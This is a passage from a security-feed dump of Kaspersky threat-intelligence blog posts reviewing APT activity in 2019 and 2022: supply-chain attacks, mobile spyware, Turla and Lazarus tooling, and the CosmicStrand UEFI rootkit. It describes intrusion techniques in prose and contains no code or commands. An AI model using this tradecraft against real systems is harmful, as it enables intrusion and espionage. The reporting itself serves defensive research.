publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the [ItaDuke](<https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html>) set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\nSince the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).\n\n## **Final thoughts**\n\nIn seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla's development of its Tunnus backdoor and Topinambour dropper.\n\nHowever, when a new campaign is observed, it's not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group. In the case of Hexane, for example, it's unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.\n\nKorean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.\n\nDespite the lower payouts by Zerodium for iOS exploits relative to those for Android, it's clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2019-10-16T10:00:26", "type": "securelist", "title": "APT trends report Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-16T10:00:26", "id": "SECURELIST:2782756D428D10F166A1D130F4307D33", "href": "https://securelist.com/apt-trends-report-q3-2019/94530/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-11T13:21:36", "description": "\n\nWhat were the most interesting developments in terms of APT activity during the year and what can we learn from them?\n\nThis is not an easy question to answer, because researchers have only partial visibility and it\u00b4s impossible to fully understand the motivation for some attacks or the developments behind them. However, let\u00b4s try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective.\n\n## Compromising supply chains\n\nTargeting supply chains has proved very successful for attackers in recent years \u2013 high-profile examples include [ShadowPad](<https://securelist.com/shadowpad-in-corporate-networks/81432/>), [ExPetr](<https://securelist.com/schroedingers-petya/78870/>) and [the backdooring of CCleaner](<https://www.wired.com/story/ccleaner-malware-targeted-tech-firms/>). In our [threat predictions for 2019](<https://securelist.com/kaspersky-security-bulletin-threat-predictions-for-2019/88878/>), we flagged this as a likely continuing attack vector. We didn't have to wait very long to see this prediction come true.\n\nIn January, we discovered a sophisticated supply-chain attack involving a popular consumer hardware vendor, the mechanism used to deliver BIOS, UEFI and software updates to vendor's laptops and desktops. The attackers behind Operation ShadowHammer added a backdoor to the utility and then distributed it to users through official channels. The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it's possible that other samples exist that target different MAC addresses. You can read our reports on ShadowHammer [here](<https://securelist.com/operation-shadowhammer/89992/>) and [here](<https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/>).\n\n## Disinformation\n\nQ3 was interesting for APT developments in the Middle East, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.\n\nIn March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. They shared several files via Telegram that supposedly belonged to the OilRig threat actor. These included logins and passwords of several alleged hacking victims, tools, details of infrastructure potentially related to different intrusions, the r\u00e9sum\u00e9s of the alleged attackers and a list of web shells \u2013 apparently relating to the period 2014-18. The targeting and TTPs are consistent with the OilRig threat actor, but it was impossible to confirm the origins of the tools included in the dump. If the data in the dump is accurate, it would also show the global reach of the OilRig group, which most researchers had thought operates primarily in the Middle East.\n\nOn April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, \"along with information about their mother and spouse and etc.\" for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that they would put up for sale \"highly confidential\" information related to MuddyWater. On April 27, three screenshots were posted in the GreenLeakers Telegram channel containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status was changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.\n\nFinally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups. Interestingly, this leak differed from the others by employing a website that allowed anyone to browse the leaked documents. It also relied on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute's CNO (computer network operations) capabilities, as well as information about victims. Previous leaks had focused more on tools, source code and individual actor profiles.\n\nClose analysis of the materials, the infrastructure and the dedicated website used by the leakers provided clues that lead us to believe that Sofacy/Hades may be connected to these leaks.\n\n## Lost in Translation and Dark Universe\n\nThe well-known Shadow Brokers leak, Lost in Translation, included an interesting Python script \u2013 sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system \u2013 for example, a file with a unique name or registry path. Although some checks are empty, sigs.py lists 44 entries, many of them related to unknown APTs that have not yet been publicly described.\n\nIn 2019, we identified the APT described as the 27th function of the sigs.py file, which we call [DarkUniverse](<https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/>). We assess with medium confidence that DarkUniverse is connected with the ItaDuke set of activities due to unique code overlaps.\n\nThe main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\n## Mobile attacks\n\nMobile implants are now a standard part of the toolset of many APT groups; and we have seen ample evidence of this during 2019.\n\nIn May, the [FT reported that hackers had exploited a zero-day vulnerability in WhatsApp](<https://www.ft.com/content/4da1117e-756c-11e9-be7d-6d846537acab>), enabling them to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance. To exploit the vulnerability, the attacker simply needed to call the victim via WhatsApp. This specially crafted call triggered a buffer overflow in WhatsApp, allowing the attacker to take control of the application and execute arbitrary code in it. The hackers apparently used this, not only to snoop on people's chats and calls, but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. WhatsApp quickly released a patch for the exploit \u2013 and that seemed to be that. However, in October, the company filed a [lawsuit accusing Israel-based NSO Group of having created the exploit](<https://techcrunch.com/2019/10/29/whatsapp-spyware-nso-group/>). WhatsApp claims that the technology sold by NSO was used to target the mobile phones of more than 1,400 of its customers in 20 different countries, including human rights activists, journalists and others. NSO denies the allegations.\n\nIn July, we published a private report about the latest versions of FinSpy for Android and iOS, developed in mid-2018. The developers of FinSpy sell the software to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. The mobile implants are similar for iOS and Android. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It seems that the iOS solution does not provide infection exploits for its customers, but is fine-tuned to clean traces of publicly available jailbreaking tools: this suggests that physical access to the victim's device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we have not observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims could be much higher.\n\nIn August, Google's Project Zero team published an extensive [analysis of at least 14 iOS zero-days](<https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html>) found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. According to Google, the attackers used a number of 'water-holed' websites to deliver the exploits \u2013 possibly from as long as three years ago. While the blog contained no details about the compromised sites, or whether they were still active, Google claimed the websites had received \"thousands of visitors per week\". The lack of victim discrimination points to a relatively non-targeted attack. However, the not-so-high estimate of the number of visitors to the water-holed sites, and the capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication.\n\nIn September, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS \u2013 the company is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium has also reduced payouts for Apple one-click exploits. On the same day, someone found a high-severity zero-day in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, was not included in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to gain full access to emails on a compromised device using an SMS message. Whatever the relative value of Android and iOS exploits, it's clear that mobile exploits are a valuable commodity.\n\n## Established threat actors continue to revamp their tools\n\nWhile investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla. This is.NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations.\n\nThis year, Turla also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new.NET file that the threat actor is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The group uses two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 for cyber-espionage; we believe Turla deploys these versions where their targets are protected with security software capable of detecting KopiLuwak.\n\nWe also observed a [new COMpfun-related targeted campaign](<https://securelist.com/compfun-successor-reductor/93633/>) using new malware. The Kaspersky Threat Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the attackers use the original COMpfun as a downloader in one of the spreading mechanisms. We named the newly identified modules Reductor after a.pdb path left in some of the samples. We believe the same COMPfun authors, who we tentatively associate with Turla based on victimology, developed this malware. One striking aspect of Reductor is that the threat actors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The authors don't touch the network packets at all. Instead, they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process's memory. Browsers use PRNG to generate the 'client random' sequence during the very beginning of the TLS handshake. Reductor adds the victims' unique encrypted hardware- and software-based identifiers to this 'client random' field.\n\nZebrocy has continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization. This module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. In September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file-sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\nIn June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia that we attribute to Platinum \u2013 one of the most technologically advanced APT actors. In this campaign, the attackers used an elaborate, previously unseen steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof. Interestingly, the attackers decided to implement the utilities they need as one huge set \u2013 an example of the framework-based architecture that is becoming more and more popular. Later in the year, [we discovered Platinum using a new backdoor, which we call Titanium](<https://securelist.com/titanium-the-platinum-group-strikes-again/94961/>), in a new campaign. Interestingly, we found certain similarities between this malware and a toolset that we called ProjectC. We detected ProjectC in 2016 being used as a toolset for lateral movement and we attributed it with low confidence to CloudComputating. Our new findings lead us to believe that the CloudComputating set of activities can be attributed to Platinum and that ProjectC was one of its toolsets.\n\nOne of the key findings of our 2018 report on [Operation AppleJeus](<https://securelist.com/operation-applejeus/87553/>) was the ability of the Lazarus group to target Mac OS. Since then, Lazarus has expanded its operations for this platform. This year, we discovered a new operation, active for at least a year, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. Lazarus also targeted a mobile gaming company in South Korea that we believe was aimed at stealing application source code. It's clear that Lazarus keeps updating its tools very quickly.\n\nIn Q3, we tracked new activity by BlueNoroff, a sub-group of Lazarus. In particular, we identified a bank in Myanmar that this threat actor compromised. We promptly contacted the bank, to share the IoCs we had found. Our collaboration allowed us to obtain valuable information on how the attackers move laterally to access high-value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nAndariel, another sub-group of Lazarus, has traditionally focused on geo-political espionage and financial intelligence in South Korea. We observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. The malware is a brand new type of backdoor, called ApolloZeus, which is started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign.\n\nIn October, we reported a campaign that began when we stumbled upon a sample that uses interesting decoy documents and images containing a contact list of North Korean overseas residents. Almost all of the decoys contain content regarding the national holiday of the Korean Peninsula and the national day of North Korea. The lure content was also related to diplomatic issues or business relationships. Alongside the additional data from our telemetry, we believe that this campaign is aimed at targets with a relationship with North Korea, such as business people, diplomatic entities and human rights organizations. The actor behind this campaign used high-profile spear phishing and multi-stage infection in order to implant tailored Ghost RAT malware that can fully control the victim. We believe that the threat actor behind this campaign, which has been ongoing for more than three years, speaks Korean; and we believe that the DarkHotel APT group is behind it.\n\nThe Lamberts is a family of sophisticated attack tools used by one or multiple threat actors. The arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a colour scheme to distinguish the various tools and implants used against different victims around the world. More information about the Lamberts arsenal is available in our 'Unraveling the Lamberts Toolkit' report, available to our APT Intel customers. This year, we added several new colours to the Lamberts palette. The Silver Lambert, which appears to be the successor of Gray Lambert, is a full-fledged backdoor, implementing some specific [NOBUS](<https://en.wikipedia.org/wiki/NOBUS>) and [OPSEC](<https://en.wikipedia.org/wiki/Operations_security>) concepts such as protection from C2 sink-holing by checking the server SSL certificate hash, self-uninstall for orphaned instances (i.e. where the C2 is unavailable) and low level file-wiping functionality. We observed victims of Silver Lambert in China, in the Aeronautics sector. Violet Lambert, a modular backdoor that appears to have been developed and deployed in 2018, is designed to run on various versions of Windows \u2013 including Windows XP, as well as Vista and later versions of Windows. We observed victims of Violet Lambert in the Middle East. We also found other new Lamberts implants on computers belonging to a critical infrastructure victim in the Middle East. The first two we dubbed Cyan Lambert (including Light and Pro versions). The third, which we called Magenta Lambert, reuses older Lamberts code and has multiple similarities with the Green, Black and White Lamberts. This malware listens on the network, waiting for a magic ping, and then executes a very well-hidden payload that we have been unable to decrypt. All the infected computers went offline shortly after our discovery.\n\nEarly in the year, we monitored a campaign by the LuckyMouse threat actor that had been targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We believe that this activity, which we call SpoiledLegacy, is the successor to the IronTiger campaign because of the similar tools and techniques it uses. The SpoiledLegacy operators use penetration-testing frameworks such as Cobalt Strike and Metasploit. While we believe that they exploit network service vulnerabilities as their main initial infection vector, we have also observed executables prepared for use in spear-phishing messages containing decoy documents, showing the operator's flexibility. Besides pen-testing frameworks, the operators use the NetBot downloader and Earthworm SOCKS tunneler. The attackers also include HTran TCP proxy source code into the malware, to redirect traffic. Some NetBot configuration data contains LAN IPs, indicating that it downloads the next stage from another infected host in the local network. Based on our telemetry, we believe that internal database servers are among the targets, as in a previous LuckyMouse Mongolian campaign. As the last stage, the attackers use different in-memory 32- and 64-bit Trojans injected into system process memory. Interestingly, all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code. From the start of 2019, we observed a spike in LuckyMouse activity, both in Central Asia and in the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. Despite different open-source publications discussing this actor's TTPs during the last year, LuckyMouse hasn't changed any of them. The threat actor still relies on its own tools to get a foothold in the victim's network, which in the new campaigns consists of using HTTPBrowser as a first stager, followed by the Soldier Trojan as a second stage implant. The group made a change to its infrastructure, as it seems to rely uniquely on IPv4 addresses instead of domain names for its C2s, which we see as an attempt to limit correlation.\n\nThe HoneyMyte APT has been active for several years. The group has adopted different techniques to perform its attacks over the past couple of years, and has targeted governments in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh, along with remote foreign embassies located in Pakistan, South Korea, the US, the UK, Belgium, Nepal, Australia and Singapore. This year, the group has targeted government organizations related to natural resource management in Myanmar and a major continental African organization, suggesting that one of the main motivations of HoneyMyte is gathering geopolitical and economic intelligence. While the group targeted a military organization in Bangladesh, it's possible that the individual targets were related to geo-political activity in the region.\n\nThe Icefog threat actor, which we have been tracking since 2011, has consistently targeted government institutions, military contractors, maritime and shipbuilding organizations, telecom operators, satellite operators, industrial and high technology companies, and mass media located mainly in Korea, Japan and Central Asia. Following [our original report on Icefog in 2013](<https://securelist.com/the-icefog-apt-a-tale-of-cloak-and-three-daggers/57331/>), the group's operational tempo slowed and we detected a very low number of active infections. We observed a slight increase in 2016; then, beginning in 2018, Icefog began conducting large waves of attacks against government institutions and military contractors in Central Asia, which are strategically important to China's Belt and Road Initiative. In the latest wave of attacks, the infection began with a spear-phishing email containing a malicious document that exploits a known vulnerability and ultimately deploys a payload. From 2018 to the beginning of 2019, the final payload was the typical Icefog backdoor. Since May 2019, the actors appear to have switched and are now using Poison Ivy as their main backdoor. The Poison Ivy payload is dropped as a malicious DLL and is loaded using a signed legitimate program, using a technique called load order hijacking. This technique is very common with many actors and it was also used in previous Icefog campaigns. During our investigation, we were also able to detect artefacts used in the actor's lateral movement. We observed the use of a public TCP scanner downloaded from GitHub, a Mimikatz variant to dump credentials from system memory, a customized keylogger to steal sensitive information, and a newer version of another backdoor named Quarian. The Quarian backdoor was used to create tunnels inside the victim infrastructure in an attempt to avoid network detections. The functionality of Quarian includes the ability to manipulate the remote file system, get information about the victim, steal saved passwords, download or upload arbitrary files, create tunnels using port forwarding, execute arbitrary commands, and start a reverse shell.\n\n## Evolution of the 'newcomers'\n\nWe first discussed ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia, in a private report in January 2018. Related activities date back to more than a decade ago, with similar code maintaining compilation timestamps from 2004. Since then, ShaggyPanther activity has been detected in several more locations: most recently in Indonesia in July, and \u2013 somewhat surprisingly \u2013 in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used web shell shared by multiple Chinese-speaking actors. SinoChopper not only performs host identification and backdoor delivery but also email archive theft and additional activity. Although not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019, we observed ShaggyPanther targeting Windows servers.\n\nIn April, we published our report on [TajMahal](<https://securelist.com/project-tajmahal/90240/>), a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents, and cryptography key stealers; and even its own file indexer for the victim's computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System \u2013 one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named Tokyo and Yokohama and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. Our telemetry revealed just a single victim, a diplomatic body from a country in Central Asia. This begs the question, why go to all that trouble for just one victim? We think there may be other victims that we haven't found yet. This theory is supported by the fact that we couldn't see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.\n\nIn February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows \u2013 the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we had discovered in the preceding months. Further analysis led us to uncover a zero-day vulnerability in win32k.sys. Microsoft patched this vulnerability, CVE-2019-0797, on March 12, crediting Kaspersky researchers Vasiliy Berdnikov and Boris Larin with the discovery. We think that several threat actors, including FruityArmor and SandCat, used this exploit. FruityArmor had used zero-days before, while SandCat is a new APT actor that we discovered not long before. Interestingly, FrutiyArmor and SandCat seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both groups with such artefacts.\n\nDuring February 2019, we observed a highly targeted attack in the southern part of Russia using a previously unknown malware that we call Cloudmid. This spy program spread via email and masqueraded as the VPN client of a well-known Russian security company that, among other things, provides solutions to protect networks. So far, we have been unable to relate this activity to any known actor. The malware itself is a simplistic document stealer. However, given its victimology and the targeted nature of the attack, we considered it relevant enough to monitor, even though we were unable to attribute this set of activities to any known actor. The low OPSEC and simplistic malware involved in this operation does not seem to point to an advanced threat actor.\n\nIn February, we identified a campaign targeting military organizations in India that we were unable to attribute to any known threat actor. The attackers rely on watering holes and spear phishing to infect their victims. Specifically, they were able to compromise the Centre for Land Warfare Studies (CLAWS) website, using it to host a malicious document used to distribute a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same period.\n\nIn Q3, we observed a campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and subsequently underwent constant development. We have only seen this malware used in a small number of active campaigns since January, all targeting government, military and diplomatic entities in the Southeast Asia region. The latest campaign, conducted in August, seems to have targeted only a select few individuals working for a military organization.\n\n## Privacy matters\n\nOn January 17, security researcher Troy Hunt reported a [leak of more than 773 million email and 21 million unique password records](<https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/>). The data, dubbed Collection #1, were originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1 TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this 'new' leak. It turned out that Collection #1 was just part of a [larger dump of leaked credentials comprising 2.2 billion stolen account records](<https://threatpost.com/collection-1-data-dump-hacker-identified/141447/>). The new data dump, dubbed Collection #2-5, was discovered by researchers at the Hasso Plattner Institute in Potsdam.\n\nIn February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, [were put up for sale on Dream Market](<https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/>), accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies [was posted](<https://www.zdnet.com/article/127-million-user-records-from-8-companies-put-up-for-sale-on-the-dark-web/>) to the same market place. Then in March, the [hacker behind the earlier data dumps posted stolen data from a further six companies](<https://threatpost.com/fourth-credential-spill-dreammarket/142901/>).\n\nStolen credentials, along with other personal information harvested from data leaks, is valuable not only to cybercriminals but also to targeted attackers, including those wishing to [track the activities of dissidents and activists](<https://www.amnesty.org/en/latest/research/2019/03/phishing-attacks-using-third-party-applications-against-egyptian-civil-society-organizations/>) in various parts of the world.\n\nWe've become used to a steady stream of reports in the news about leaks of email addresses and passwords. The theft of such 'traditional' forms of authentication is bad enough, but the effects of using alternative methods of authentication can be much more serious. In August, [two Israeli researchers discovered](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>) fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database. The exposure of biometric data is of particular concern. A compromised password can be changed, but a biometric characteristic is for life.\n\nMoreover, the more widespread use of smart devices in new areas of our lives opens up a bigger pool of data for attackers. Consider, for example, the potential impact of smart speakers for listening in on unguarded conversations in the home. Social media giants are sitting on a growing pile of personal information \u2013 information that would prove very valuable to criminals and APT threat actors alike.\n\n## Final thoughts\n\nWe will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)", "cvss3": {}, "published": "2019-12-04T10:00:22", "type": "securelist", "title": "APT review: what the world\u2019s threat actors got up to in 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-0797"], "modified": "2019-12-04T10:00:22", "id": "SECURELIST:C7E3F6A27205B506CE8683317323C0BC", "href": "https://securelist.com/ksb-2019-review-of-the-year/95394/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-18T08:07:16", "description": "\n\n * **IT threat evolution in Q3 2022**\n * [IT threat evolution in Q3 2022. Non-mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/>)\n * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)\n\n## Targeted attacks\n\n### CosmicStrand: discovery of a sophisticated UEFI rootkit\n\nIn July, we [reported a rootkit](<https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/>) that we found in modified [Unified Extensible Firmware Interface](<https://encyclopedia.kaspersky.com/glossary/uefi/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) (UEFI) firmware, the code that loads and initiates the boot process when the computer is turned on. Rootkits are malware implants that are installed deep in the operating system. Difficult to detect, they ensure that a computer remains infected even if someone reinstalls the operating system or replaces the hard drive. However, they aren&#x27;t easy to create: the slightest programming error could crash the machine. Nevertheless, in our [APT predictions for 2022](<https://securelist.com/advanced-threat-predictions-for-2022/104870/>), we noted that more attackers would reach the sophistication level required to develop such tools.\n\nThe main purpose of CosmicStrand is to download a malicious program at startup, which then performs the tasks set by the attackers. Having successfully passed through all stages of the boot process, the rootkit eventually runs a shell code and contacts the attackers&#x27; C2 (Command-and-Control) server, from which it receives a malicious payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/07/20124904/CosmicStrand_UEFI_malware_01.png>)\n\nWe were unable to intercept the file received by the rootkit from the C2 server. However, on one of the infected machines, we found malware that we think is probably related to CosmicStrand. This malware creates a user named &quot;aaaabbbb&quot; in the operating system with local administrator rights.\n\nWe identified targets of CosmicStrand, which we attribute to an unknown Chinese-speaking threat actor, in China, Vietnam, Iran and Russia. All of them were ordinary people using our free antivirus solution, seemingly unconnected with any organization of interest to a sophisticated attacker of this kind. It also turned out that the motherboards infected in all known cases came from just two manufacturers. Therefore, it&#x27;s likely that the attackers found some common vulnerability in these motherboards that made UEFI infection possible.\n\nIt&#x27;s also unclear how the attackers managed to deliver the malware. It&#x27;s possible that the attackers are able to infect UEFI remotely. Or that those infected had purchased a modified motherboard from a reseller.\n\n### Andariel deploys DTrack and Maui ransomware\n\nOn 6 July, the US CISA (Cybersecurity and Infrastructure Security Agency) published an [alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>) in which they accused North Korean state-sponsored threat actors of using the Maui ransomware to target the US healthcare sector. While CISA offered nothing to substantiate its attribution, [we determined](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) that approximately 10 hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the same target, preceded by deployment of the 3proxy tool months earlier. We believe that this helps to solidify the attribution to the Korean-speaking APT Andariel (aka Silent Chollima and Stonefly), with low-to-medium confidence.\n\nAndariel&#x27;s primary tool is DTrack, used to collect information about the target, send it to a remote host and, in the case of the variant used in these attacks, store it on a remote host in the target network. When the attackers find noteworthy data, the Maui ransomware is deployed \u2013 it is typically detected on targeted hosts 10 hours after the activation of DTrack.\n\nThe attackers also use another tool, called 3Proxy, to maintain remote access to the compromised computer.\n\nTo infect target systems, the attackers exploit unpatched versions of public online services. In one such case, the malware was downloaded from an HFS (HTTP file server): the attackers used an unknown exploit that enabled them to run a PowerShell script from a remote server. In another, they were able to compromise a WebLogic server through an exploit for the CVE-2017-10271 vulnerability, which ultimately allowed them to run a script.\n\nOur research revealed that, rather than just focusing on a particular industry, Andariel is ready to attack any company. We detected at least one attack on a housing company in Japan, as well as several targets in India, Vietnam and Russia.\n\n### VileRAT: DeathStalker&#x27;s continuous strike at foreign and crypto-currency exchanges\n\nIn late August 2020, we published an [overview of 